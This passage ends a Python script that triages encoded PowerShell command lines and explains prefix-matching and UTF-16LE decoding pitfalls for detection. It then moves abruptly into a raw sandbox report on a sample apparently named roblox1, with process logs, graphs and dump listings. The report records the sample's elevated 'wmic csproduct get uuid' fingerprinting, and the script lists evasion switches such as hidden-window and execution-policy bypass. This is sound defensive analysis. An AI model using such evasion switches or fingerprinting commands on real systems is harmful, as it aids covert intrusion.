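        switch = canonical_switch(tokens[i])
        value = tokens[i + 1] if i + 1 < len(tokens) else ""
        if switch == "encodedcommand" and value:
            result.script = decode_encoded_command(value)
            result.switches.append("EncodedCommand")
            i += 1                                        # consume the value token
        elif switch == "executionpolicy" and value.lower() in ("bypass", "unrestricted"):
            result.switches.append(f"ExecutionPolicy {value}")
            i += 1
        elif switch == "windowstyle" and value.lower().startswith("h"):
            result.switches.append("WindowStyle Hidden")
            i += 1
        elif switch in ("noprofile", "noninteractive"):
            result.switches.append("NoProfile" if switch == "noprofile" else "NonInteractive")
        i += 1
    if result.script is not None:
        lowered = result.script.lower()
        result.indicators = [kw for kw, _ in SCRIPT_INDICATORS if kw.lower() in lowered]
    return result


if __name__ == "__main__":
    t = triage_cmdline(SAMPLE_CMDLINE)
    print("switches:  ", ", ".join(t.switches))
    print("indicators:", ", ".join(t.indicators))
    print(t.script)
```

Run as a script it prints the switches, the indicator hits and the recovered screenshot routine. Two points matter for detection: the host resolves switches by prefix, so a rule that matches only the literal string -EncodedCommand misses -e, -ec and -enc, which is why canonical_switch works from a minimum-prefix table; and the blob must be decoded as UTF-16LE rather than UTF-8, or the result is NUL-separated characters that keyword matching never sees. The report's "Encrypted powershell cmdline option" label is a misnomer in that sense: nothing here is encrypted, it is only encoded.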

Target ID: 58
Start time: 09:08:58
Start date: 18/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 59
Start time: 09:09:01
Start date: 18/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase: 0x7ff7ef160000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 60
Start time: 09:09:01
Start date: 18/12/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): true
Commandline: wmic csproduct get uuid
Imagebase: 0x980000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

Memory Dump Source
• Source File: 00000000.00000002.1971861789.00007FF7AC5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7AC5F0000, based on PE: true
• Associated: 00000000.00000002.1971831715.00007FF7AC5F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1971901510.00007FF7AC60D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1971928821.00007FF7AC60E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1971955809.00007FF7AC612000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1971999843.00007FF7AC614000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1971999843.00007FF7AC630000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1971999843.00007FF7AC633000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1971999843.00007FF7AC638000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1972124086.00007FF7AC63B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1972124086.00007FF7AD03B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ac5f0000_roblox1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0223baef4331ed4ed1a8c7beb13d382d990cc06f23f219c2883b323266e75979
• Instruction ID: 2c3a519e101296b28af294e22c6f8ae84654713980c6d097afeb44457a54afc9
• Opcode Fuzzy Hash: 0223baef4331ed4ed1a8c7beb13d382d990cc06f23f219c2883b323266e75979
• Instruction Fuzzy Hash: 4EC08C35A09202E8F300BF24C8023A873346B00B00F958030D9080BBA2CB3CE0024A60

Execution Graph

Execution Coverage:0.1%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:5.8%
Total number of Nodes:1164
Total number of Limit Nodes:3
                                                                                                                                                                                                                                    execution_graph 8241 7ffbaaf273a0 PyTuple_Size PyTuple_GetSlice 8242 7ffbaaf273ea PyObject_Call 8241->8242 8243 7ffbaaf273da 8241->8243 8244 7ffbaaf2740b 8242->8244 8245 7ffbaaf27402 _Py_Dealloc 8242->8245 8245->8244 12030 7ffbaaf27420 12031 7ffbaaf2744c 12030->12031 12032 7ffbaaf27566 PyTuple_New 12030->12032 12033 7ffbaaf2746b PyObject_GetAttr 12031->12033 12040 7ffbaaf27466 12031->12040 12034 7ffbaaf275a1 12032->12034 12035 7ffbaaf27579 12032->12035 12033->12040 12035->12034 12036 7ffbaaf27598 _Py_Dealloc 12035->12036 12036->12034 12037 7ffbaaf27562 12037->12032 12038 7ffbaaf27515 12038->12032 12041 7ffbaaf27531 PyCMethod_New 12038->12041 12039 7ffbaaf27508 PyType_IsSubtype 12039->12032 12039->12038 12040->12034 12040->12037 12040->12038 12040->12039 12041->12034 12042 7ffbaaf27553 12041->12042 12042->12037 12043 7ffbaaf27559 _Py_Dealloc 12042->12043 12043->12037 12044 7ffbaaf25c20 12045 7ffbaaf25c30 12044->12045 12046 7ffbaaf25c33 PyObject_GetAttr 12044->12046 12045->12046 8406 7ffbaaf12ba0 _PyThreadState_UncheckedGet 8407 7ffbaaf12c12 8406->8407 8408 7ffbaaf12ea4 8407->8408 8409 7ffbaaf12c69 8407->8409 8415 7ffbaaf12d44 8408->8415 8416 7ffbaaf13109 8408->8416 8410 7ffbaaf12c80 8409->8410 8411 7ffbaaf12ce1 _PyDict_GetItem_KnownHash 8409->8411 8414 7ffbaaf12c8c 8410->8414 8476 7ffbaaf25c40 8410->8476 8412 7ffbaaf12d21 PyErr_Occurred 8411->8412 8411->8414 8412->8414 8414->8415 8420 7ffbaaf12d54 PyLong_FromSize_t 8414->8420 8424 7ffbaaf12ef3 8415->8424 8429 7ffbaaf12eea _Py_Dealloc 8415->8429 8418 7ffbaaf1310f _Py_Dealloc 8416->8418 8419 7ffbaaf13118 8416->8419 8418->8419 8422 7ffbaaf1311e _Py_Dealloc 8419->8422 8423 7ffbaaf13102 8419->8423 8420->8415 8425 7ffbaaf12d7b PyLong_FromSize_t 8420->8425 8421 7ffbaaf12cba PyErr_Occurred 8421->8414 
8428 7ffbaaf12cc5 PyErr_Format 8421->8428 8422->8423 8512 7ffbaaf27830 8423->8512 8426 7ffbaaf12f0c 8424->8426 8430 7ffbaaf12f03 _Py_Dealloc 8424->8430 8425->8415 8427 7ffbaaf12d9e 8425->8427 8431 7ffbaaf12f2d 8426->8431 8433 7ffbaaf12f24 _Py_Dealloc 8426->8433 8435 7ffbaaf12dca _Py_Dealloc 8427->8435 8439 7ffbaaf12dd3 8427->8439 8428->8414 8429->8424 8430->8426 8436 7ffbaaf12f39 _Py_Dealloc 8431->8436 8443 7ffbaaf12f42 8431->8443 8433->8431 8434 7ffbaaf1318f 8435->8439 8436->8443 8437 7ffbaaf13189 _Py_Dealloc 8437->8434 8438 7ffbaaf12e2c 8444 7ffbaaf12e3c 8438->8444 8445 7ffbaaf12e33 _Py_Dealloc 8438->8445 8439->8438 8442 7ffbaaf12e23 _Py_Dealloc 8439->8442 8440 7ffbaaf12fb9 8441 7ffbaaf13015 8440->8441 8448 7ffbaaf1300f _Py_Dealloc 8440->8448 8449 7ffbaaf1302a 8441->8449 8454 7ffbaaf13021 _Py_Dealloc 8441->8454 8442->8438 8443->8440 8450 7ffbaaf12f75 8443->8450 8491 7ffbaaf2a3d0 8443->8491 8451 7ffbaaf12e51 8444->8451 8452 7ffbaaf12e48 _Py_Dealloc 8444->8452 8445->8444 8448->8441 8455 7ffbaaf1303e 8449->8455 8456 7ffbaaf13035 _Py_Dealloc 8449->8456 8450->8440 8496 7ffbaaf26830 PyErr_NormalizeException 8450->8496 8451->8415 8458 7ffbaaf12e6c _Py_Dealloc 8451->8458 8459 7ffbaaf12e75 8451->8459 8452->8451 8454->8449 8457 7ffbaaf13052 8455->8457 8461 7ffbaaf13049 _Py_Dealloc 8455->8461 8456->8455 8462 7ffbaaf13066 8457->8462 8467 7ffbaaf1305d _Py_Dealloc 8457->8467 8458->8459 8459->8415 8471 7ffbaaf12e8b _Py_Dealloc 8459->8471 8460 7ffbaaf1309a 8463 7ffbaaf130bb 8460->8463 8464 7ffbaaf130b5 _Py_Dealloc 8460->8464 8461->8457 8468 7ffbaaf1307a 8462->8468 8472 7ffbaaf13071 _Py_Dealloc 8462->8472 8465 7ffbaaf130d1 8463->8465 8466 7ffbaaf130c8 _Py_Dealloc 8463->8466 8464->8463 8469 7ffbaaf130dc _Py_Dealloc 8465->8469 8470 7ffbaaf130e2 8465->8470 8466->8465 8467->8462 8468->8434 8468->8437 8469->8470 8473 7ffbaaf130ed _Py_Dealloc 8470->8473 8474 7ffbaaf130f3 8470->8474 8471->8415 8472->8468 8473->8474 8474->8423 8475 7ffbaaf130f9 _Py_Dealloc 8474->8475 8475->8423 8477 
7ffbaaf25c6c 8476->8477 8478 7ffbaaf25c58 _PyObject_GenericGetAttrWithDict 8476->8478 8479 7ffbaaf25c7b PyObject_GetAttr 8477->8479 8480 7ffbaaf25c76 8477->8480 8478->8477 8479->8480 8481 7ffbaaf25c8d _PyThreadState_UncheckedGet 8480->8481 8482 7ffbaaf12cae 8480->8482 8483 7ffbaaf25cae 8481->8483 8486 7ffbaaf25cc8 8481->8486 8482->8414 8482->8421 8483->8482 8483->8486 8489 7ffbaaf2a3d0 PyErr_GivenExceptionMatches 8483->8489 8484 7ffbaaf25d0d 8485 7ffbaaf25d21 8484->8485 8488 7ffbaaf25d18 _Py_Dealloc 8484->8488 8485->8482 8490 7ffbaaf25d31 _Py_Dealloc 8485->8490 8486->8482 8486->8484 8487 7ffbaaf25d07 _Py_Dealloc 8486->8487 8487->8484 8488->8485 8489->8486 8490->8482 8492 7ffbaaf2a3d9 8491->8492 8494 7ffbaaf2a3e3 8491->8494 8492->8450 8493 7ffbaaf2a5a2 PyErr_GivenExceptionMatches 8494->8493 8495 7ffbaaf2a424 8494->8495 8495->8450 8497 7ffbaaf26891 8496->8497 8498 7ffbaaf26966 8496->8498 8499 7ffbaaf2689b PyException_SetTraceback 8497->8499 8504 7ffbaaf268b1 8497->8504 8500 7ffbaaf2697f _Py_Dealloc 8498->8500 8502 7ffbaaf26985 8498->8502 8499->8498 8499->8504 8500->8502 8501 7ffbaaf2699b 8503 7ffbaaf12fb1 8501->8503 8507 7ffbaaf269ab _Py_Dealloc 8501->8507 8502->8501 8505 7ffbaaf26995 _Py_Dealloc 8502->8505 8503->8440 8503->8460 8506 7ffbaaf2693a 8504->8506 8508 7ffbaaf26931 _Py_Dealloc 8504->8508 8505->8501 8509 7ffbaaf2694e 8506->8509 8510 7ffbaaf26945 _Py_Dealloc 8506->8510 8507->8503 8508->8506 8509->8503 8511 7ffbaaf26959 _Py_Dealloc 8509->8511 8510->8509 8511->8503 8513 7ffbaaf2785c 8512->8513 8514 7ffbaaf27868 8512->8514 8513->8514 8515 7ffbaaf27862 _Py_Dealloc 8513->8515 8516 7ffbaaf27873 _Py_Dealloc 8514->8516 8518 7ffbaaf2787c 8514->8518 8515->8514 8516->8518 8517 7ffbaaf27890 8517->8468 8518->8517 8519 7ffbaaf27887 _Py_Dealloc 8518->8519 8519->8517 8520 7ffbaaf17fa0 8521 7ffbaaf17fd3 8520->8521 8522 7ffbaaf17fc7 8520->8522 8524 7ffbaaf17ffd 8521->8524 8525 7ffbaaf17ff7 _Py_Dealloc 8521->8525 8522->8521 8523 7ffbaaf17fcd _Py_Dealloc 8522->8523 8523->8521 
8526 7ffbaaf18027 8524->8526 8527 7ffbaaf18021 _Py_Dealloc 8524->8527 8525->8524 8528 7ffbaaf18051 8526->8528 8529 7ffbaaf1804b _Py_Dealloc 8526->8529 8527->8526 8530 7ffbaaf1807b 8528->8530 8531 7ffbaaf18075 _Py_Dealloc 8528->8531 8529->8528 8532 7ffbaaf180a5 8530->8532 8533 7ffbaaf1809f _Py_Dealloc 8530->8533 8531->8530 8534 7ffbaaf180cf 8532->8534 8535 7ffbaaf180c9 _Py_Dealloc 8532->8535 8533->8532 8536 7ffbaaf180f9 8534->8536 8537 7ffbaaf180f3 _Py_Dealloc 8534->8537 8535->8534 8537->8536 8538 7ffbaaf2b3a0 PyArg_UnpackTuple 8539 7ffbaaf2b3f4 8538->8539 8540 7ffbaaf2bba0 8541 7ffbaaf2bbe1 PyOS_snprintf PyErr_WarnEx 8540->8541 8542 7ffbaaf2bbc7 8540->8542 8543 7ffbaaf2bc54 8541->8543 12047 7ffbaaf28820 12048 7ffbaaf2884e 12047->12048 12049 7ffbaaf28a18 12047->12049 12048->12049 12050 7ffbaaf28860 PyMem_Malloc 12048->12050 12051 7ffbaaf2888b PyTuple_New 12050->12051 12052 7ffbaaf28880 PyErr_NoMemory 12050->12052 12055 7ffbaaf288c2 PyMem_Free 12051->12055 12056 7ffbaaf288d0 PyDict_Next 12051->12056 12054 7ffbaaf289fe 12052->12054 12055->12054 12057 7ffbaaf28901 12056->12057 12058 7ffbaaf289a6 12056->12058 12059 7ffbaaf28920 PyDict_Next 12057->12059 12062 7ffbaaf289c7 _Py_Dealloc 12058->12062 12065 7ffbaaf289d0 12058->12065 12059->12059 12060 7ffbaaf28978 12059->12060 12060->12058 12061 7ffbaaf2898b PyErr_SetString 12060->12061 12061->12058 12062->12065 12063 7ffbaaf289ed PyMem_Free 12063->12054 12064 7ffbaaf289df _Py_Dealloc 12064->12065 12065->12063 12065->12064 8704 7ffbaaf1f3a5 8705 7ffbaaf235f4 8704->8705 8706 7ffbaaf23603 8705->8706 8707 7ffbaaf235fa _Py_Dealloc 8705->8707 8708 7ffbaaf24247 8706->8708 8710 7ffbaaf2423e _Py_Dealloc 8706->8710 8707->8706 8709 7ffbaaf2425c 8708->8709 8711 7ffbaaf24253 _Py_Dealloc 8708->8711 8712 7ffbaaf24271 8709->8712 8713 7ffbaaf24268 _Py_Dealloc 8709->8713 8710->8708 8711->8709 8714 7ffbaaf2428d 8712->8714 8716 7ffbaaf24284 _Py_Dealloc 8712->8716 8713->8712 8715 7ffbaaf242a9 8714->8715 8717 7ffbaaf242a0 _Py_Dealloc 8714->8717 
8718 7ffbaaf242c5 8715->8718 8719 7ffbaaf242bc _Py_Dealloc 8715->8719 8716->8714 8717->8715 8720 7ffbaaf242e1 8718->8720 8721 7ffbaaf242d8 _Py_Dealloc 8718->8721 8719->8718 8722 7ffbaaf242fa 8720->8722 8723 7ffbaaf242f1 _Py_Dealloc 8720->8723 8721->8720 8724 7ffbaaf24313 8722->8724 8725 7ffbaaf2430a _Py_Dealloc 8722->8725 8723->8722 8726 7ffbaaf2432c 8724->8726 8727 7ffbaaf24323 _Py_Dealloc 8724->8727 8725->8724 8728 7ffbaaf24345 8726->8728 8729 7ffbaaf2433c _Py_Dealloc 8726->8729 8727->8726 8730 7ffbaaf2435e 8728->8730 8731 7ffbaaf24355 _Py_Dealloc 8728->8731 8729->8728 8732 7ffbaaf24377 8730->8732 8733 7ffbaaf2436e _Py_Dealloc 8730->8733 8731->8730 8734 7ffbaaf24390 8732->8734 8735 7ffbaaf24387 _Py_Dealloc 8732->8735 8733->8732 8736 7ffbaaf243a9 8734->8736 8738 7ffbaaf243a0 _Py_Dealloc 8734->8738 8735->8734 8737 7ffbaaf243c5 8736->8737 8739 7ffbaaf243bc _Py_Dealloc 8736->8739 8740 7ffbaaf243e1 8737->8740 8741 7ffbaaf243d8 _Py_Dealloc 8737->8741 8738->8736 8739->8737 8742 7ffbaaf243fd 8740->8742 8743 7ffbaaf243f4 _Py_Dealloc 8740->8743 8741->8740 8744 7ffbaaf24419 8742->8744 8745 7ffbaaf24410 _Py_Dealloc 8742->8745 8743->8742 8746 7ffbaaf24435 8744->8746 8748 7ffbaaf2442c _Py_Dealloc 8744->8748 8745->8744 8747 7ffbaaf24451 8746->8747 8749 7ffbaaf24448 _Py_Dealloc 8746->8749 8750 7ffbaaf2446d 8747->8750 8751 7ffbaaf24464 _Py_Dealloc 8747->8751 8748->8746 8749->8747 8752 7ffbaaf24489 8750->8752 8753 7ffbaaf24480 _Py_Dealloc 8750->8753 8751->8750 8754 7ffbaaf244a5 8752->8754 8755 7ffbaaf2449c _Py_Dealloc 8752->8755 8753->8752 8756 7ffbaaf244c1 8754->8756 8757 7ffbaaf244b8 _Py_Dealloc 8754->8757 8755->8754 8758 7ffbaaf244dd 8756->8758 8759 7ffbaaf244d4 _Py_Dealloc 8756->8759 8757->8756 8760 7ffbaaf244f9 8758->8760 8761 7ffbaaf244f0 _Py_Dealloc 8758->8761 8759->8758 8762 7ffbaaf24515 8760->8762 8763 7ffbaaf2450c _Py_Dealloc 8760->8763 8761->8760 8764 7ffbaaf24531 8762->8764 8765 7ffbaaf24528 _Py_Dealloc 8762->8765 8763->8762 8766 7ffbaaf2454d 8764->8766 8767 
7ffbaaf24544 _Py_Dealloc 8764->8767 8765->8764 8768 7ffbaaf24569 8766->8768 8770 7ffbaaf24560 _Py_Dealloc 8766->8770 8767->8766 8769 7ffbaaf24585 8768->8769 8771 7ffbaaf2457c _Py_Dealloc 8768->8771 8772 7ffbaaf245a1 8769->8772 8773 7ffbaaf24598 _Py_Dealloc 8769->8773 8770->8768 8771->8769 8774 7ffbaaf245bd 8772->8774 8775 7ffbaaf245b4 _Py_Dealloc 8772->8775 8773->8772 8776 7ffbaaf245d9 8774->8776 8777 7ffbaaf245d0 _Py_Dealloc 8774->8777 8775->8774 8778 7ffbaaf245f5 8776->8778 8780 7ffbaaf245ec _Py_Dealloc 8776->8780 8777->8776 8779 7ffbaaf24611 8778->8779 8781 7ffbaaf24608 _Py_Dealloc 8778->8781 8782 7ffbaaf2462d 8779->8782 8783 7ffbaaf24624 _Py_Dealloc 8779->8783 8780->8778 8781->8779 8784 7ffbaaf24649 8782->8784 8785 7ffbaaf24640 _Py_Dealloc 8782->8785 8783->8782 8786 7ffbaaf24665 8784->8786 8787 7ffbaaf2465c _Py_Dealloc 8784->8787 8785->8784 8788 7ffbaaf24681 8786->8788 8789 7ffbaaf24678 _Py_Dealloc 8786->8789 8787->8786 8790 7ffbaaf2469d 8788->8790 8791 7ffbaaf24694 _Py_Dealloc 8788->8791 8789->8788 8792 7ffbaaf246b9 8790->8792 8793 7ffbaaf246b0 _Py_Dealloc 8790->8793 8791->8790 8794 7ffbaaf246d5 8792->8794 8795 7ffbaaf246cc _Py_Dealloc 8792->8795 8793->8792 8796 7ffbaaf246f1 8794->8796 8797 7ffbaaf246e8 _Py_Dealloc 8794->8797 8795->8794 8798 7ffbaaf2470d 8796->8798 8799 7ffbaaf24704 _Py_Dealloc 8796->8799 8797->8796 8800 7ffbaaf24729 8798->8800 8802 7ffbaaf24720 _Py_Dealloc 8798->8802 8799->8798 8801 7ffbaaf24745 8800->8801 8803 7ffbaaf2473c _Py_Dealloc 8800->8803 8804 7ffbaaf24761 8801->8804 8805 7ffbaaf24758 _Py_Dealloc 8801->8805 8802->8800 8803->8801 8806 7ffbaaf2477d 8804->8806 8807 7ffbaaf24774 _Py_Dealloc 8804->8807 8805->8804 8808 7ffbaaf24799 8806->8808 8809 7ffbaaf24790 _Py_Dealloc 8806->8809 8807->8806 8810 7ffbaaf247b5 8808->8810 8812 7ffbaaf247ac _Py_Dealloc 8808->8812 8809->8808 8811 7ffbaaf247d1 8810->8811 8813 7ffbaaf247c8 _Py_Dealloc 8810->8813 8814 7ffbaaf247ed 8811->8814 8815 7ffbaaf247e4 _Py_Dealloc 8811->8815 8812->8810 8813->8811 8816 
7ffbaaf24809 8814->8816 8817 7ffbaaf24800 _Py_Dealloc 8814->8817 8815->8814 8818 7ffbaaf24825 8816->8818 8819 7ffbaaf2481c _Py_Dealloc 8816->8819 8817->8816 8820 7ffbaaf24841 8818->8820 8821 7ffbaaf24838 _Py_Dealloc 8818->8821 8819->8818 8822 7ffbaaf2485d 8820->8822 8823 7ffbaaf24854 _Py_Dealloc 8820->8823 8821->8820 8824 7ffbaaf24879 8822->8824 8825 7ffbaaf24870 _Py_Dealloc 8822->8825 8823->8822 8826 7ffbaaf24895 8824->8826 8827 7ffbaaf2488c _Py_Dealloc 8824->8827 8825->8824 8828 7ffbaaf248b1 8826->8828 8829 7ffbaaf248a8 _Py_Dealloc 8826->8829 8827->8826 8830 7ffbaaf248cd 8828->8830 8831 7ffbaaf248c4 _Py_Dealloc 8828->8831 8829->8828 8832 7ffbaaf248e9 8830->8832 8834 7ffbaaf248e0 _Py_Dealloc 8830->8834 8831->8830 8833 7ffbaaf24905 8832->8833 8835 7ffbaaf248fc _Py_Dealloc 8832->8835 8836 7ffbaaf24921 8833->8836 8837 7ffbaaf24918 _Py_Dealloc 8833->8837 8834->8832 8835->8833 8838 7ffbaaf2493d 8836->8838 8839 7ffbaaf24934 _Py_Dealloc 8836->8839 8837->8836 8840 7ffbaaf24959 8838->8840 8841 7ffbaaf24950 _Py_Dealloc 8838->8841 8839->8838 8842 7ffbaaf24975 8840->8842 8844 7ffbaaf2496c _Py_Dealloc 8840->8844 8841->8840 8843 7ffbaaf24991 8842->8843 8845 7ffbaaf24988 _Py_Dealloc 8842->8845 8846 7ffbaaf249ad 8843->8846 8847 7ffbaaf249a4 _Py_Dealloc 8843->8847 8844->8842 8845->8843 8848 7ffbaaf249c9 8846->8848 8849 7ffbaaf249c0 _Py_Dealloc 8846->8849 8847->8846 8850 7ffbaaf249e5 8848->8850 8851 7ffbaaf249dc _Py_Dealloc 8848->8851 8849->8848 8852 7ffbaaf24a01 8850->8852 8853 7ffbaaf249f8 _Py_Dealloc 8850->8853 8851->8850 8854 7ffbaaf24a1d 8852->8854 8855 7ffbaaf24a14 _Py_Dealloc 8852->8855 8853->8852 8856 7ffbaaf24a39 8854->8856 8857 7ffbaaf24a30 _Py_Dealloc 8854->8857 8855->8854 8858 7ffbaaf24a55 8856->8858 8859 7ffbaaf24a4c _Py_Dealloc 8856->8859 8857->8856 8860 7ffbaaf258cb _Py_Dealloc 8858->8860 8861 7ffbaaf1f2e9 8858->8861 8859->8858 8860->8861 8862 7ffbaaf25953 8861->8862 8863 7ffbaaf1f348 _Py_Dealloc 8861->8863 8863->8862 12066 7ffbaaf11c27 12067 7ffbaaf11cdc 
12066->12067 12068 7ffbaaf11cfd _Py_Dealloc 12067->12068 12069 7ffbaaf11d06 12067->12069 12083 7ffbaaf11ce1 12067->12083 12068->12069 12070 7ffbaaf11d1d 12069->12070 12071 7ffbaaf11d7e _PyDict_GetItem_KnownHash 12069->12071 12073 7ffbaaf25c40 7 API calls 12070->12073 12074 7ffbaaf11d29 12070->12074 12072 7ffbaaf11dbe PyErr_Occurred 12071->12072 12071->12074 12072->12074 12075 7ffbaaf11d4b 12073->12075 12076 7ffbaaf11e1b PyObject_IsTrue 12074->12076 12077 7ffbaaf11e26 12074->12077 12074->12083 12075->12074 12078 7ffbaaf11d57 PyErr_Occurred 12075->12078 12076->12077 12079 7ffbaaf11e6d 12077->12079 12080 7ffbaaf11e33 12077->12080 12078->12074 12081 7ffbaaf11d62 PyErr_Format 12078->12081 12079->12083 12084 7ffbaaf11e72 _Py_Dealloc 12079->12084 12082 7ffbaaf11e49 _Py_Dealloc 12080->12082 12080->12083 12081->12074 12082->12083 12084->12083 9187 7ffbaaf25bb0 9188 7ffbaaf25be6 9187->9188 9189 7ffbaaf25bd7 9187->9189 9191 7ffbaaf25bfa 9188->9191 9192 7ffbaaf25bf1 _Py_Dealloc 9188->9192 9189->9188 9190 7ffbaaf25bdd _Py_Dealloc 9189->9190 9190->9188 9193 7ffbaaf25c0e 9191->9193 9194 7ffbaaf25c05 _Py_Dealloc 9191->9194 9192->9191 9194->9193 12085 7ffbaaf1fc30 12086 7ffbaaf24231 12085->12086 12087 7ffbaaf2423e _Py_Dealloc 12086->12087 12088 7ffbaaf24247 12086->12088 12087->12088 12089 7ffbaaf2425c 12088->12089 12090 7ffbaaf24253 _Py_Dealloc 12088->12090 12091 7ffbaaf24271 12089->12091 12092 7ffbaaf24268 _Py_Dealloc 12089->12092 12090->12089 12093 7ffbaaf2428d 12091->12093 12095 7ffbaaf24284 _Py_Dealloc 12091->12095 12092->12091 12094 7ffbaaf242a9 12093->12094 12096 7ffbaaf242a0 _Py_Dealloc 12093->12096 12097 7ffbaaf242c5 12094->12097 12098 7ffbaaf242bc _Py_Dealloc 12094->12098 12095->12093 12096->12094 12099 7ffbaaf242e1 12097->12099 12100 7ffbaaf242d8 _Py_Dealloc 12097->12100 12098->12097 12101 7ffbaaf242fa 12099->12101 12102 7ffbaaf242f1 _Py_Dealloc 12099->12102 12100->12099 12103 7ffbaaf24313 12101->12103 12104 7ffbaaf2430a _Py_Dealloc 12101->12104 12102->12101 12105 
7ffbaaf2432c 12103->12105 12106 7ffbaaf24323 _Py_Dealloc 12103->12106 12104->12103 12107 7ffbaaf24345 12105->12107 12108 7ffbaaf2433c _Py_Dealloc 12105->12108 12106->12105 12109 7ffbaaf2435e 12107->12109 12110 7ffbaaf24355 _Py_Dealloc 12107->12110 12108->12107 12111 7ffbaaf24377 12109->12111 12112 7ffbaaf2436e _Py_Dealloc 12109->12112 12110->12109 12113 7ffbaaf24390 12111->12113 12114 7ffbaaf24387 _Py_Dealloc 12111->12114 12112->12111 12115 7ffbaaf243a9 12113->12115 12117 7ffbaaf243a0 _Py_Dealloc 12113->12117 12114->12113 12116 7ffbaaf243c5 12115->12116 12118 7ffbaaf243bc _Py_Dealloc 12115->12118 12119 7ffbaaf243e1 12116->12119 12120 7ffbaaf243d8 _Py_Dealloc 12116->12120 12117->12115 12118->12116 12121 7ffbaaf243fd 12119->12121 12122 7ffbaaf243f4 _Py_Dealloc 12119->12122 12120->12119 12123 7ffbaaf24419 12121->12123 12124 7ffbaaf24410 _Py_Dealloc 12121->12124 12122->12121 12125 7ffbaaf24435 12123->12125 12127 7ffbaaf2442c _Py_Dealloc 12123->12127 12124->12123 12126 7ffbaaf24451 12125->12126 12128 7ffbaaf24448 _Py_Dealloc 12125->12128 12129 7ffbaaf2446d 12126->12129 12130 7ffbaaf24464 _Py_Dealloc 12126->12130 12127->12125 12128->12126 12131 7ffbaaf24489 12129->12131 12132 7ffbaaf24480 _Py_Dealloc 12129->12132 12130->12129 12133 7ffbaaf244a5 12131->12133 12134 7ffbaaf2449c _Py_Dealloc 12131->12134 12132->12131 12135 7ffbaaf244c1 12133->12135 12136 7ffbaaf244b8 _Py_Dealloc 12133->12136 12134->12133 12137 7ffbaaf244dd 12135->12137 12138 7ffbaaf244d4 _Py_Dealloc 12135->12138 12136->12135 12139 7ffbaaf244f9 12137->12139 12140 7ffbaaf244f0 _Py_Dealloc 12137->12140 12138->12137 12141 7ffbaaf24515 12139->12141 12142 7ffbaaf2450c _Py_Dealloc 12139->12142 12140->12139 12143 7ffbaaf24531 12141->12143 12144 7ffbaaf24528 _Py_Dealloc 12141->12144 12142->12141 12145 7ffbaaf2454d 12143->12145 12146 7ffbaaf24544 _Py_Dealloc 12143->12146 12144->12143 12147 7ffbaaf24569 12145->12147 12149 7ffbaaf24560 _Py_Dealloc 12145->12149 12146->12145 12148 7ffbaaf24585 12147->12148 12150 
[Control-flow graph data: node/edge list of basic blocks in the 0x7ffbaaf0xxxx-0x7ffbaaf3xxxx range (Python C-API calls such as _Py_Dealloc, PyErr_Format, PyErr_SetString, PyErr_Occurred, PyTuple_New, PyList_New, PyDict_New, PyDict_SetItem, PyDict_Next, PyObject_GetAttr, PyObject_SetAttr, PyObject_IsTrue, PyUnicode_Decode, PyUnicode_DecodeUTF8, PyUnicode_Join, PyByteArray_Resize, PyImport_ImportModule, PyImport_ImportModuleLevelObject, Py_EnterRecursiveCall, Py_LeaveRecursiveCall) and one block at 0x7ffbaa7fbc97 calling GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId and QueryPerformanceCounter; the raw graph edge list is omitted here.]

Callgraph

• Executed
• Not Executed
• Opacity -> Relevance
• Disassembly available
[Callgraph data: 110 function nodes (Function_00007FFBAAF2D39E through Function_00007FFBAAF074B0) with caller/callee edges, e.g. Function_00007FFBAAF12BA0 -> Function_00007FFBAAF25C40 -> Function_00007FFBAAF2A3D0 and Function_00007FFBAA7FB5B4 -> Function_00007FFBAA7FBC74; the raw graph listing is omitted here.]

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
• Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
Similarity
• API ID: Err_$DeallocImportImport_Module$ClearUnraisableWarnWrite
• String ID: Cython module failed to register with collections.abc module$backports_abc$collections.abc
• API String ID: 3055409517-3167216013
